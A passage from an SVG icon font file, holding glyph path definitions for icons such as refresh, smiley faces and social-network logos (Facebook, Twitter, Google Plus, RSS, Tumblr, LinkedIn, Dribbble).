3.232-7.072-5.312-8.512-15.328-3.232-22.4l96-128c3.168-4.192 7.968-6.4 12.8-6.4 3.328 0 6.72 1.024 9.6 3.2 7.072 5.312 8.512 15.328 3.232 22.4l-96 127.968z" />
<glyph unicode="&#xe05a;" glyph-name="refresh" d="M852.192 832h155.808c8.832 0 16 7.168 16 16s-7.168 16-16 16h-192c-8.832 0-16-7.168-16-16v-192c0-8.832 7.168-16 16-16s16 7.168 16 16v150.944l19.552-19.552c90.656-90.656 140.608-211.2 140.608-339.392s-49.952-248.736-140.608-339.392c-134.56-134.592-336.128-177.024-513.632-108-8.224 3.264-17.504-0.864-20.704-9.088-3.2-8.256 0.864-17.536 9.12-20.704 60.288-23.424 123.136-34.816 185.504-34.816 133.44 0 264.512 52.16 362.336 150.016 96.704 96.672 149.984 225.28 149.984 362.016s-53.28 265.312-149.984 361.984l-21.984 21.984zM208 256c-8.832 0-16-7.168-16-16v-154.88l-22.816 22.816c-90.656 90.656-140.608 211.2-140.608 339.392s49.952 248.768 140.608 339.424c132.32 132.352 331.232 175.84 506.752 110.592 8.192-3.072 17.472 1.12 20.576 9.44 3.072 8.288-1.152 17.504-9.44 20.576-187.168 69.504-399.36 23.2-540.512-117.984-96.704-96.672-149.984-225.28-149.984-362.016s53.28-265.344 149.984-362.016l21.312-21.344h-151.872c-8.832 0-16-7.168-16-16s7.168-16 16-16h187.392c1.28-0.32 12.032 0.8 15.168 3.936 0.128 0.128 0.16 0.288 0.288 0.416 3.136 2.944 5.152 7.008 5.152 11.648v192c0 8.832-7.168 16-16 16z" />
<glyph unicode="&#xe05b;" glyph-name="happy3" d="M512 961.088c-282.912 0-513.12-230.144-513.12-513.088s230.208-513.088 513.12-513.088 513.12 230.144 513.12 513.088-230.208 513.088-513.12 513.088zM512-30.912c-264.064 0-478.88 214.848-478.88 478.912s214.816 478.912 478.88 478.912 478.88-214.848 478.88-478.912-214.816-478.912-478.88-478.912zM336 432c35.296 0 64 28.704 64 64s-28.704 64-64 64-64-28.704-64-64 28.704-64 64-64zM336 528c17.632 0 32-14.336 32-32s-14.368-32-32-32-32 14.336-32 32 14.368 32 32 32zM688 432c35.296 0 64 28.704 64 64s-28.704 64-64 64-64-28.704-64-64 28.704-64 64-64zM688 528c17.632 0 32-14.336 32-32s-14.368-32-32-32-32 14.336-32 32 14.368 32 32 32zM730.336 253.6c-54.272-58.784-131.104-92.512-210.816-92.512-80.96 0-158.592 34.592-212.992 94.944-6.336 6.976-17.184 7.584-24.16 1.216-7.008-6.304-7.584-17.12-1.248-24.16 60.896-67.488 147.776-106.176 238.4-106.176 89.216 0 175.232 37.728 235.936 103.488 6.4 6.944 5.984 17.76-0.96 24.16s-17.76 6.016-24.16-0.96z" />
<glyph unicode="&#xe05c;" glyph-name="sad3" d="M512 961.088c-282.912 0-513.12-230.144-513.12-513.088s230.208-513.088 513.12-513.088 513.12 230.144 513.12 513.088-230.208 513.088-513.12 513.088zM512-30.912c-264.064 0-478.88 214.848-478.88 478.912s214.816 478.912 478.88 478.912 478.88-214.848 478.88-478.912-214.816-478.912-478.88-478.912zM517.216 325.664c-89.248 0-175.264-37.728-235.968-103.52-6.4-6.944-5.984-17.76 0.992-24.16 6.912-6.4 17.728-6.016 24.16 0.96 54.24 58.816 131.072 92.544 210.784 92.544 80.928 0 158.592-34.592 212.992-94.944 3.36-3.712 8.032-5.632 12.704-5.632 4.096 0 8.192 1.44 11.456 4.416 7.008 6.304 7.584 17.12 1.248 24.16-60.896 67.488-147.776 106.176-238.368 106.176zM336 432c35.296 0 64 28.704 64 64s-28.704 64-64 64-64-28.704-64-64 28.704-64 64-64zM336 528c17.632 0 32-14.336 32-32s-14.368-32-32-32-32 14.336-32 32 14.368 32 32 32zM688 432c35.296 0 64 28.704 64 64s-28.704 64-64 64-64-28.704-64-64 28.704-64 64-64zM688 528c17.632 0 32-14.336 32-32s-14.368-32-32-32-32 14.336-32 32 14.368 32 32 32z" />
<glyph unicode="&#xe05d;" glyph-name="facebook3" d="M512 961.088c-282.912 0-513.12-230.144-513.12-513.088s230.208-513.088 513.12-513.088 513.12 230.144 513.12 513.088-230.208 513.088-513.12 513.088zM512-30.912c-264.064 0-478.88 214.848-478.88 478.912s214.816 478.912 478.88 478.912 478.88-214.848 478.88-478.912-214.816-478.912-478.88-478.912zM624 736h-85.376c-108.736 1.088-122.624-66.208-122.624-139.040v-52.96h-48c-9.44 1.088-17.12-6.56-16-16v-96c-1.12-9.44 6.56-17.088 16-16h48v-240c-0.992-9.44 6.656-17.088 16.096-16h97.76c9.44-1.088 17.088 6.56 14.080 16l0.064 240h80c9.44-1.088 17.12 6.56 16 16v96c1.12 9.44-6.56 17.088-16 16h-80.096l0.096 48c3.104 20.448 3.104 17.12 22.080 16h57.248c4.448 0.992 9.184 0.448 12.512 3.68s5.248 7.648 4.128 12.32v96c1.152 9.44-6.528 17.088-15.968 16zM606.88 641.792l-40.128 1.536c-49.696 0-53.856-26.976-53.856-54.592l-0.128-60.672c0-4.544 1.792-8.896 4.992-12.128 3.2-3.2 7.552-4.992 12.096-4.992h78.144v-61.824h-78.080c-9.44 0-17.088-7.648-17.12-17.088l-0.032-240.032h-64.768v240c0 9.44-6.432 17.088-15.904 17.088h-48.096v61.824h48.096c4.544 0 8.896 1.792 12.096 4.992 3.2 3.232 3.776 7.584 3.776 12.128v68.96c0 71.744 14.496 105.92 90.624 105.92h68.256v-61.12z" />
<glyph unicode="&#xe05e;" glyph-name="twitter2" d="M512 961.088c-282.912 0-513.12-230.144-513.12-513.088s230.208-513.088 513.12-513.088 513.12 230.144 513.12 513.088-230.208 513.088-513.12 513.088zM512-30.912c-264.064 0-478.88 214.848-478.88 478.912s214.816 478.912 478.88 478.912 478.88-214.848 478.88-478.912-214.816-478.912-478.88-478.912zM793.408 606.528c3.52 6.528 6.464 13.408 8.736 20.576 2.144 6.784-0.064 14.144-5.632 18.592-5.536 4.416-13.28 4.928-19.36 1.344-16.416-9.76-34.080-16.96-52.672-21.536-22.336 20.192-51.68 31.584-81.984 31.584-67.36 0-122.144-54.784-122.144-122.080 0-1.696 0.032-3.36 0.096-5.056-71.52 8.928-137.536 45.28-183.52 101.696-3.52 4.352-8.96 6.624-14.592 6.24-5.6-0.448-10.624-3.584-13.44-8.48-10.816-18.56-16.544-39.776-16.544-61.408 0-20.48 5.088-40.192 14.432-57.664-2.368-0.384-4.704-1.248-6.848-2.496-5.216-3.104-8.448-9.344-8.448-15.392 0-36.32 16.16-69.664 42.208-92.32-0.384-0.352-0.736-0.736-1.12-1.12-4-4.544-5.312-10.816-3.456-16.576 11.232-35.008 37.248-62.272 69.888-75.68-33.312-16.48-72-22.912-108.992-18.528-7.808 0.704-15.392-3.712-18.112-11.264-2.656-7.488 0.16-15.84 6.88-20.16 50.944-32.64 109.792-49.888 170.208-49.888 197.76 0 315.968 160.64 315.968 315.936 0 1.76 0 3.488-0.032 5.248 19.104 14.912 35.68 32.736 49.312 53.12 4.224 6.304 3.776 14.688-1.12 20.512-4.832 5.728-12.8 7.712-19.712 4.8zM737.568 550.368c-4.704-3.392-7.392-8.928-7.104-14.752 0.192-4.224 0.288-8.512 0.288-12.736 0-138.496-105.376-281.76-281.728-281.76-31.648 0-62.848 5.312-92.384 15.616 35.36 6.752 68.512 21.824 97.44 44.48 5.696 4.48 7.968 12.032 5.664 18.912-2.304 6.848-8.672 11.52-15.904 11.648-28.512 0.576-54.368 14.752-70.208 37.184 8.096 0.544 16.032 1.888 23.744 3.968 7.648 2.080 12.832 9.152 12.576 17.088-0.256 7.904-5.952 14.624-13.728 16.192-32.096 6.432-57.28 30.176-66.592 60.96 8.512-2.144 17.248-3.392 25.984-3.68 7.52 0.032 14.496 4.64 16.832 11.872s-0.416 15.2-6.784 19.424c-24.48 16.384-39.104 43.712-39.104 73.184 0 7.136 0.864 14.176 2.528 21.056 55.392-56.8 130.56-91.104 210.176-95.104 5.632-0.032 10.56 1.984 13.984 6.112s4.736 9.6 3.52 14.848c-1.504 6.496-2.272 13.248-2.272 20.064 0 48.48 39.456 87.904 87.936 87.904 24.224 0 47.616-10.112 64.16-27.776 4.032-4.32 9.984-6.208 15.808-5.088 5.28 1.056 10.496 2.272 15.648 3.68-2.304-1.728-4.704-3.328-7.232-4.832-6.912-4.128-9.984-12.576-7.392-20.192s10.368-12.608 18.208-11.424c1.952 0.224 3.872 0.48 5.824 0.736-3.168-2.624-6.496-5.152-9.888-7.584z" />
<glyph unicode="&#xe05f;" glyph-name="googleplus" d="M512 961.088c-282.944 0-513.088-230.144-513.088-513.088s230.144-513.088 513.088-513.088 513.088 230.144 513.088 513.088-230.144 513.088-513.088 513.088zM512-30.912c-264.064 0-478.912 214.848-478.912 478.912s214.848 478.912 478.912 478.912 478.912-214.848 478.912-478.912-214.848-478.912-478.912-478.912zM577.088 654.016c0 9.44-7.648 17.088-17.088 17.088h-136.32c-0.832 0-1.504-0.352-2.304-0.48-1.824 0.064-3.52 0.48-5.376 0.48-71.2 0-129.088-49.376-129.088-110.080s57.92-110.080 129.088-110.080c9.824 0 19.296 1.12 28.512 2.912-2.4-9.312-3.712-20-2.112-31.936 1.504-11.168 5.952-21.856 11.776-32.256-11.872 2.080-24.096 3.488-36.832 3.488-88.064 0-159.712-52.96-159.712-118.080s71.648-118.080 159.712-118.080c88.096 0 159.744 52.96 159.744 118.080 0 33.472-19.136 63.584-49.504 85.088-1.216 3.072-3.040 5.92-5.984 7.904-27.136 18.368-42.336 37.888-45.216 57.984-3.2 22.368 9.984 38.72 10.656 39.552 1.44 1.696 2.432 3.616 3.104 5.6 33.152 19.936 54.976 52.704 54.976 89.856 0 29.472-13.824 56.128-36 75.904h50.88c9.44-0.064 17.088 7.616 17.088 17.056zM417.344 191.104c-69.216 0-125.536 37.664-125.536 83.904s56.32 83.904 125.536 83.904 125.568-37.664 125.568-83.904-56.352-83.904-125.568-83.904zM416 485.088c-52.32 0-94.912 34.048-94.912 75.904s42.592 75.904 94.912 75.904 94.912-34.048 94.912-75.904-42.592-75.904-94.912-75.904zM809.984 576h-74.912v76c0 9.44-7.648 17.088-17.088 17.088s-17.088-7.648-13.984-13.088v-80h-78.016c-9.44 1.088-17.088-6.56-17.088-16s7.648-17.088 17.088-16h78.016v-76c0-9.44 4.576-17.088 14.016-17.088s17.088 7.648 17.088 17.088v76h74.912c9.44-1.088 17.088 6.56 17.088 16s-7.68 17.088-17.12 16z" />
<glyph unicode="&#xe060;" glyph-name="rss3" d="M512 961.088c-282.944 0-513.088-230.144-513.088-513.088s230.144-513.088 513.088-513.088 513.088 230.144 513.088 513.088-230.144 513.088-513.088 513.088zM512-30.912c-264.064 0-478.912 214.848-478.912 478.912s214.848 478.912 478.912 478.912 478.912-214.848 478.912-478.912-214.848-478.912-478.912-478.912zM336.064 513.568c-9.44 0-17.088-7.648-17.088-17.088s7.648-17.088 17.088-17.088c72.096 0 132.48-22.304 174.528-64.512 42.080-42.176 64.32-102.656 64.32-174.88 0-9.44 7.648-17.088 17.088-17.088s17.088 7.648 17.088 17.088c0.032 81.472-25.664 150.272-74.24 199.040-48.672 48.736-117.376 74.528-198.784 74.528zM336.16 671.136c-9.44 0-17.088-7.648-17.088-17.088s7.648-17.088 17.088-17.088c228.48 0 400.736-170.656 400.736-396.928 0-9.44 7.648-17.088 17.088-17.088s17.088 7.648 17.088 17.088c0.032 245.76-186.944 431.104-434.912 431.104zM383.968 355.776c-35.872 0-65.056-29.216-65.056-65.12 0-35.872 29.184-65.056 65.056-65.056 35.904 0 65.12 29.184 65.12 65.088-0.032 35.904-29.248 65.088-65.12 65.088zM383.968 259.776c-17.024 0-30.88 13.856-30.88 30.88 0 17.056 13.856 30.944 30.88 30.944s30.912-13.92 30.944-30.944c0-17.024-13.888-30.88-30.944-30.88z" />
<glyph unicode="&#xe061;" glyph-name="tumblr3" d="M512 961.088c-282.944 0-513.088-230.144-513.088-513.088s230.144-513.088 513.088-513.088 513.088 230.144 513.088 513.088-230.144 513.088-513.088 513.088zM512-30.912c-264.064 0-478.912 214.848-478.912 478.912s214.848 478.912 478.912 478.912 478.912-214.848 478.912-478.912-214.848-478.912-478.912-478.912zM655.936 576h-111.936v112.032c1.056 9.44-6.592 17.088-16.032 17.088h-82.528c-8.64 0-15.904-6.4-16.96-15.008-3.040-24.416-8.512-44.448-16.224-59.616-7.552-14.944-17.792-27.936-30.4-38.688-10.272-8.736-27.936-17.344-51.040-24.8-7.072-2.272-11.84-8.864-10.816-16.288v-86.688c-1.024-9.44 6.624-17.088 16.064-16.032l47.936-32v-149.376c-1.088 9.632 1.184 3.104 5.632-7.392l1.888-4.544c0.16-0.416 16.384-40.736 35.904-57.568 14.4-12.352 31.84-21.952 51.84-28.544 18.72-6.112 34.592-9.664 60.512-9.664 21.824 0 42.464 2.208 61.44 6.624 21.792 5.088 41.504 11.968 62.016 21.664 6.016 2.816 9.824 8.832 8.768 15.456v76.96c1.024 6.272-2.4 12.064-7.936 15.072s-12.256 2.688-17.536-0.768c-22.56-14.816-34.656-17.472-57.472-17.472-10.624 0-19.84 2.176-28.192 6.752-3.36 6.112-8.224 24.896-10.080 32.288-1.664 6.368-3.072 11.584-4.032 14.176-1.76 4.672-1.76 21.376-1.728 40.704l0.032 77.632h110.88c9.44-1.056 17.088 6.592 16.064 16.032v96c1.024 9.44-6.624 17.088-16.064 15.968zM638.848 480h-110.88c-9.44 1.12-17.088-6.528-15.968-15.968l-0.064-93.568c-1.152-27.296-1.152-42.304 2.784-52.8 0.736-1.952 1.696-5.888 2.944-10.688 8.128-31.648 13.248-45.888 23.776-52.064 14.016-8.384 30.016-12.64 47.616-12.64 18.336 0 33.056 1.6 49.792 8.608v-37.12c-14.88-6.368-29.568-11.168-45.44-14.88-16.416-3.808-34.432-5.76-53.664-5.76-21.568 0-33.728 2.688-49.856 7.968-15.68 5.184-29.248 12.608-40.224 22.016-8.704 7.488-20.928 30.528-26.4 44.256l-2.112 5.152c-3.040 7.2-4.064 9.632-5.152 26.112v165.408c1.088 9.44-6.56 17.088-16 17.088h-46.848v57.408c22.016 8.032 39.072 17.184 50.848 27.264 16.128 13.696 29.152 30.24 38.752 49.216 7.776 15.328 13.632 34.048 17.44 55.936h50.688v-110.912c0-9.44 7.648-17.088 17.088-16.032h110.88v-64z" />
<glyph unicode="&#xe062;" glyph-name="linkedin3" d="M624.48 577.536c-21.696 0-37.76-5.472-50.336-12.384-2.016 7.168-8.64 12.416-16.448 10.848h-95.488c-9.44 1.568-17.088-6.080-14.176-16v-352c-2.912-8.96 4.736-16.64 14.176-16h95.488c9.44-0.64 17.088 7.040 17.088 16.48l-0.032 212.736c-0.032 0.096-0.384 10.272 6.048 17.28 5.152 5.568 14.016 8.416 26.272 8.416 20.416 0 29.504-8.352 32.896-27.040v-211.392c-3.36-9.44 4.288-17.12 13.728-16.48h100.64c9.44-0.64 17.088 7.040 13.696 16.48v218.496c3.36 111.104-75.776 150.56-143.552 150.56zM737.216 224h-66.432v195.872c0 37.792-24.416 61.216-63.68 61.216-22.208 0-39.488-6.528-51.392-19.392-16.544-17.92-15.264-40.64-11.712-45.696v-192h-64.704v319.36h61.312v-10.752c0-6.496 3.68-12.48 9.536-15.328s12.8-2.144 17.984 1.792l4.48 3.456c12.96 10.208 26.368 20.8 51.904 20.8 26.432 0 112.736-8.416 112.736-116.384v-202.944zM352 737.088c-35.904 0-65.088-29.184-65.088-65.088s29.184-65.088 65.088-65.088 65.088 29.184 65.088 65.088-29.184 65.088-65.088 65.088zM352 641.088c-17.024 0-30.912 13.888-30.912 30.912s13.888 30.912 30.912 30.912 30.912-13.888 30.912-30.912-13.888-30.912-30.912-30.912zM397.696 577.568h-94.976c-9.44 0-17.088-7.648-14.72-17.568v-352c-2.368-8.96 5.28-16.64 14.72-16h94.976c9.44-0.64 17.088 7.040 17.088 16.48v352c0 9.44-7.648 17.088-17.088 17.088zM384 224h-64.192v319.36h64.192v-319.36zM512 961.088c-282.944 0-513.088-230.144-513.088-513.088s230.144-513.088 513.088-513.088 513.088 230.144 513.088 513.088-230.144 513.088-513.088 513.088zM512-30.912c-264.064 0-478.912 214.848-478.912 478.912s214.848 478.912 478.912 478.912 478.912-214.848 478.912-478.912-214.848-478.912-478.912-478.912z" />
<glyph unicode="&#xe063;" glyph-name="dribbble2" d="M512 961.088c-282.944 0-513.088-230.144-513.088-513.088s230.144-513.088 513.088-513.088 513.088 230.144 513.088 513.088-230.144 513.088-513.088 513.088zM512-30.912c-264.064 0-478.912 214.848-478.912 478.912s214.848 478.912 478.912 478.912 478.912-214.848 478.912-478.912-214.848-478.912-478.912-478.912zM699.232 623.84c-49.216 52.416-115.68 81.248-187.232 81.248-33.6 0-66.4-6.464-97.504-19.264-88.256-36.16-148.896-117.504-158.304-212.192-0.8-8.448-1.28-16.96-1.28-25.632 0-77.696 34.624-150.4 95.072-199.52 45.664-37.12 103.232-57.568 162.016-57.568 37.088 0 73.152 7.936 107.264 23.616 69.632 32.064 120.96 92.832 140.832 166.752 0 0 0 0.032 0 0.032 5.952 22.4 8.992 44.832 8.992 66.688 0 65.472-24.8 127.904-69.856 175.84zM730.752 406.24c-5.664 1.216-11.168 1.76-16.8 2.752-7.456 1.312-14.912 2.688-22.272 3.648-8.736 1.12-17.28 1.696-25.856 2.272-6.912 0.448-13.824 1.056-20.608 1.152-2.112 0.032-4.352 0.352-6.464 0.352-11.264 0-22.432-0.544-33.536-1.504-1.44-0.128-2.848-0.416-4.288-0.544-8.96-0.896-17.888-1.92-26.656-3.456-1.44 3.744-3.072 7.264-4.544 10.976-5.952 15.072-12.096 29.92-18.432 44.544-1.568 3.584-2.944 7.36-4.512 10.912 3.36 1.344 6.368 2.848 9.632 4.256 3.328 1.44 6.656 2.848 9.856 4.352 7.104 3.328 13.856 6.784 20.384 10.368 2.080 1.152 4.288 2.208 6.304 3.36 8.32 4.8 16.16 9.824 23.552 14.976 1.76 1.248 3.36 2.528 5.056 3.776 5.568 4.064 10.912 8.16 15.936 12.32 2.176 1.824 4.224 3.616 6.304 5.44 4.384 3.84 8.544 7.68 12.48 11.52 1.792 1.728 3.584 3.456 5.28 5.216 4.48 4.576 8.64 9.152 12.576 13.696 0.768 0.896 1.664 1.792 2.4 2.688 4.192 4.992 8.128 9.92 11.712 14.752 30.208-38.944 46.656-86.496 46.656-136.064 0-13.664-1.408-27.648-4.16-41.76zM512 670.912c57.472 0 111.168-21.504 152.704-60.864-0.448-0.672-0.832-1.28-1.312-1.92-1.216-1.696-2.56-3.424-3.84-5.12-2.336-3.104-4.8-6.24-7.424-9.44-1.568-1.888-3.2-3.808-4.864-5.696-2.752-3.136-5.664-6.304-8.704-9.472-1.824-1.92-3.68-3.84-5.632-5.76-3.424-3.36-7.136-6.72-10.912-10.048-1.888-1.664-3.648-3.328-5.632-4.992-5.888-4.928-12.096-9.792-18.816-14.496-0.416-0.288-0.928-0.576-1.376-0.896-6.304-4.384-13.024-8.64-20.096-12.736-2.592-1.504-5.44-2.912-8.16-4.384-5.184-2.816-10.496-5.568-16.064-8.16-3.424-1.6-7.040-3.136-10.624-4.64-2.88-1.216-5.984-2.336-8.96-3.52-0.8 1.696-1.632 3.168-2.432 4.864-6.688 13.92-13.376 27.424-20 40.096-0.512 0.992-1.024 1.888-1.536 2.88-6.336 12.096-12.544 23.456-18.688 34.368-1.408 2.496-2.784 4.992-4.192 7.424-6.176 10.816-12.16 21.024-17.92 30.56-1.312 2.176-2.528 4.128-3.808 6.208-5.184 8.448-10.176 16.384-14.88 23.68-0.48 0.736-1.056 1.696-1.536 2.432 20.96 6.368 42.656 9.632 64.704 9.632zM414.752 648.512c0.192-0.288 0.384-0.576 0.576-0.864 5.056-7.712 10.56-16.384 16.288-25.6 1.216-1.952 2.464-3.968 3.68-5.984 5.92-9.632 12.032-19.872 18.4-31.008 0.704-1.216 1.408-2.528 2.112-3.744 5.984-10.496 12.128-21.728 18.368-33.44 1.184-2.24 2.368-4.416 3.584-6.72 6.624-12.608 13.312-25.952 20.032-39.872 0.48-0.992 0.96-2.016 1.44-3.008-10.624-2.976-21.056-6.208-32.384-8.352-1.728-0.32-3.52-0.544-5.248-0.864-34.368-6.080-71.872-8.256-112-6.72-3.104 0.128-6.112 0.128-9.28 0.288-15.424 0.8-31.552 2.656-47.744 4.576 12.48 70.24 57.76 130.112 122.176 161.312zM289.088 448c0 1.536 0.032 3.104 0.064 4.64 4.544-0.544 8.768-0.576 13.28-1.024 12.544-1.28 24.864-2.272 36.992-2.912 7.2-0.384 14.336-0.672 21.376-0.8 4.32-0.096 8.928-0.512 13.184-0.512 0 0 0 0 0.032 0 9.184 0 18.016 0.544 26.912 0.96 3.744 0.16 7.584 0.16 11.264 0.384 16.544 1.088 32.608 2.912 48.16 5.408 4.032 0.64 7.84 1.536 11.776 2.272 11.936 2.24 23.52 4.896 34.752 8 2.336 0.64 4.896 0.96 7.168 1.664 1.632-3.616 3.2-7.296 4.8-10.976 5.984-13.696 11.808-27.616 17.408-41.728 1.344-3.392 2.688-6.816 4.032-10.24-3.456-0.992-6.656-2.24-10.048-3.328-4.416-1.376-8.8-2.784-13.056-4.32-7.008-2.496-13.728-5.248-20.384-8.096-3.616-1.568-7.328-3.008-10.848-4.672-7.968-3.744-15.616-7.776-23.040-11.968-1.792-0.992-3.712-1.92-5.472-2.944-9.12-5.312-17.76-10.944-26.016-16.736-2.304-1.6-4.384-3.296-6.624-4.928-5.824-4.288-11.552-8.576-16.928-12.992-2.72-2.24-5.248-4.48-7.872-6.72-4.576-3.936-8.992-7.872-13.248-11.84-2.56-2.432-5.056-4.8-7.488-7.232-3.872-3.84-7.584-7.616-11.136-11.424-2.272-2.432-4.576-4.832-6.72-7.232-0.8-0.896-1.728-1.824-2.528-2.688-44.512 42.080-69.792 100.224-69.792 161.984zM385.664 264.416c0.576 0.64 1.024 1.216 1.6 1.856 1.92 2.144 4.032 4.288 6.048 6.464 3.264 3.488 6.656 6.976 10.208 10.464 2.272 2.24 4.64 4.48 7.040 6.72 3.712 3.488 7.616 6.976 11.616 10.432 2.56 2.208 5.12 4.416 7.776 6.592 4.416 3.616 9.088 7.136 13.792 10.624 2.592 1.92 5.088 3.872 7.744 5.728 6.4 4.48 13.12 8.768 20.032 12.928 1.28 0.768 2.432 1.6 3.744 2.368 8.256 4.8 16.928 9.312 25.952 13.536 2.752 1.28 5.696 2.368 8.512 3.584 6.496 2.816 13.088 5.536 19.968 7.968 3.648 1.28 7.424 2.4 11.2 3.584 3.712 1.152 7.616 2.144 11.456 3.2 7.2-20.064 14.24-40.256 20.544-60.928 0.288-0.928 0.608-1.792 0.896-2.72 6.624-21.952 12.384-44.32 17.92-66.784-68.416-26.464-146.624-16.768-206.048 24.384zM623.552 255.264c-5.056 20.096-10.624 40.032-16.544 59.744-0.224 0.768-0.416 1.568-0.64 2.336-6.176 20.384-12.768 40.48-19.776 60.256 4.64 0.736 9.248 1.6 13.952 2.144 3.904 0.448 7.808 0.96 11.744 1.248 11.424 0.864 22.976 1.216 34.752 0.96 1.312-0.032 2.592 0.096 3.904 0.032 13.216-0.448 26.624-1.728 40.224-3.584 3.68-0.512 7.424-1.28 11.136-1.888 6.336-1.056 12.768-2.464 19.168-3.808-17.728-49.6-52.288-91.072-97.92-117.44z" />
<glyph unicode="&#xe900;" glyph-name="icons9" d="M509.856 624.352c-88.384 0-160.256-71.936-160.256-160.384 0-88.384 71.936-160.384 160.256-160.384 88.48 0 160.384 72 160.384 160.384 0 88.416-71.904 160.384-160.384 160.384zM509.856 332.928c-72.224 0-130.912 58.848-130.912 131.104s58.752 131.104 130.912 131.104 131.104-58.816 131.104-131.104-58.816-131.104-131.104-131.104zM900.16 575.648l-92.768 11.712 57.472 73.792c4.576 5.792 4.032 14.144-1.216 19.328l-137.248 137.408c-5.216 5.216-13.504 5.632-19.296 1.184l-73.856-57.472-11.584 92.768c-0.928 7.392-7.2 12.864-14.592 12.864h-194.24c-7.392 0-13.632-5.568-14.592-12.896l-11.584-92.768-73.792 57.44c-5.76 4.48-14.048 4.032-19.328-1.184l-137.408-137.312c-5.216-5.216-5.728-13.504-1.184-19.328l57.44-73.792-92.768-11.712c-7.36-0.928-12.864-7.136-12.864-14.464v-194.304c0-7.392 5.568-13.568 12.864-14.528l92.768-11.584-57.44-73.952c-4.576-5.792-4.032-14.144 1.184-19.296l137.408-137.28c5.28-5.28 13.504-5.728 19.328-1.12l73.792 57.376 11.584-92.864c0.928-7.2 7.2-12.768 14.528-12.768h194.24c7.392 0 13.632 5.568 14.592 12.832l11.584 92.864 73.856-57.376c5.824-4.576 14.144-4.128 19.296 1.12l137.28 137.408c5.216 5.216 5.728 13.504 1.216 19.392l-57.44 73.728 92.736 11.584c7.36 0.96 12.864 7.136 12.864 14.528v194.304c0 7.296-5.568 13.504-12.864 14.432zM883.712 379.776l-105.44-13.12c-5.216-0.608-9.664-4.032-11.712-8.96-1.984-4.896-1.28-10.4 1.92-14.624l65.216-83.936-119.104-119.136-84 65.28c-4.096 3.104-9.6 3.904-14.528 1.92-4.896-2.016-8.256-6.528-8.96-11.712l-13.184-105.536h-168.448l-13.184 105.536c-0.672 5.216-4.096 9.664-8.96 11.712-4.896 2.112-10.4 1.248-14.592-1.92l-83.904-65.28-119.136 119.040 65.376 84.032c3.2 4.16 3.936 9.76 1.984 14.624-2.048 4.896-6.496 8.288-11.712 8.96l-105.536 13.12v168.448l105.568 13.28c5.216 0.608 9.664 4.032 11.712 8.928 1.984 4.896 1.216 10.432-1.984 14.624l-65.376 83.872 119.136 119.072 83.904-65.216c4.16-3.2 9.792-4.032 14.592-1.984 4.896 2.016 8.256 6.528 8.96 11.744l13.184 105.536h168.448l13.184-105.536c0.672-5.216 4.096-9.664 8.96-11.744 4.896-1.984 10.432-1.184 14.528 1.984l84 65.408 119.104-119.136-65.216-83.872c-3.232-4.16-3.904-9.76-1.92-14.624s6.464-8.256 11.648-8.928l105.504-13.28v-168.448z" />
<glyph unicode="&#xe901;" glyph-name="icons20" d="M863.712 591.68c54.112 54.112 54.112 142.144 0 196.32-54.112 54.080-142.176 53.952-196.32 0-4.032-4.128-4.032-9.856-1.792-14.752-41.824 17.92-87.936 27.936-136.288 27.936-48.416 0-94.464-9.984-136.384-27.936 2.24 4.96 2.24 10.592-1.824 14.624-54.112 54.112-142.112 54.112-196.32 0-54.144-54.144-54.144-142.24 0-196.32 2.56-2.624 6.080-3.936 9.536-3.936 1.856 0 3.392 1.344 5.024 2.112-17.856-41.824-27.872-87.872-27.872-136.192 0-112.832 54.304-213.024 137.856-276.64-10.592-4.416-20.192-11.296-25.952-21.472-7.392-12.704-9.344-27.584-5.632-41.824 3.872-14.24 13.024-26.208 25.888-33.696 8.416-4.896 17.92-7.36 27.616-7.36 19.68 0 38.112 10.592 47.936 27.712 5.888 10.24 7.136 21.536 6.080 32.512 41.248-17.312 86.56-26.944 134.048-26.944 47.424 0 92.64 9.6 133.92 26.88-1.024-10.912 0.256-22.176 6.176-32.48 9.856-17.056 28.224-27.68 47.808-27.68 9.664 0 19.232 2.56 27.616 7.424 12.832 7.36 21.984 19.232 25.792 33.504 3.872 14.272 1.92 29.216-5.408 41.984-5.824 10.144-15.52 16.928-25.984 21.472 83.52 63.552 137.856 163.776 137.856 276.704 0 48.288-10.016 94.4-27.936 136.352 1.632-0.704 3.2-2.112 5.216-2.112 3.392 0 6.88 1.28 9.536 3.936zM213.824 768.896c43.616 43.52 114.688 43.52 158.176 0 1.76-1.728 4.096-2.048 6.336-2.656-70.56-34.144-127.712-91.328-161.92-161.888-0.576 2.24-0.864 4.576-2.56 6.336-43.552 43.52-43.552 114.528 0 158.176zM365.76 113.568c-7.392-12.96-25.472-18.016-38.528-10.304-6.592 3.84-11.296 9.952-13.28 17.248-1.984 7.2-0.928 14.848 2.848 21.376 5.024 8.736 14.4 14.144 24.512 14.144 4.96 0 9.856-1.344 14.176-3.872 13.504-7.68 18.080-25.12 10.304-38.592zM741.632 141.888c3.776-6.464 4.896-14.176 2.816-21.408-1.888-7.296-6.624-13.376-13.184-17.184-13.184-7.68-31.072-2.656-38.592 10.304-7.776 13.504-3.104 30.88 10.336 38.624 4.288 2.464 9.152 3.84 14.016 3.84 10.208 0 19.552-5.472 24.576-14.208zM849.952 453.536c0-176.896-143.872-320.8-320.64-320.8-176.864 0-320.8 143.936-320.8 320.8 0 176.8 143.936 320.64 320.8 320.64 176.8 0 320.64-143.872 320.64-320.64zM844.704 610.784c-1.792-1.728-2.048-4.128-2.624-6.336-34.24 70.432-91.392 127.616-161.92 161.76 2.24 0.576 4.576 0.928 6.336 2.656 43.616 43.552 114.624 43.552 158.208 0 43.488-43.616 43.488-114.624 0-158.176zM529.344 713.12c-144.448 0-261.92-117.44-261.92-261.856s117.472-261.888 261.92-261.888c144.384 0 261.76 117.472 261.76 261.888s-117.408 261.856-261.76 261.856zM529.344 216.32c-129.632 0-234.912 105.408-234.912 234.88s105.344 234.88 234.912 234.88c129.44 0 234.816-105.376 234.816-234.88s-105.408-234.88-234.816-234.88zM542.752 455.84v160.224c0 7.456-6.016 13.504-13.472 13.504-7.488 0-13.504-6.048-13.504-13.504v-165.824c0-3.552 1.44-7.008 4.032-9.536l78.112-78.24c2.56-2.56 6.048-3.904 9.536-3.904 3.424 0 6.88 1.344 9.568 3.904 5.216 5.28 5.216 13.92 0 19.168l-74.208 74.176z" />
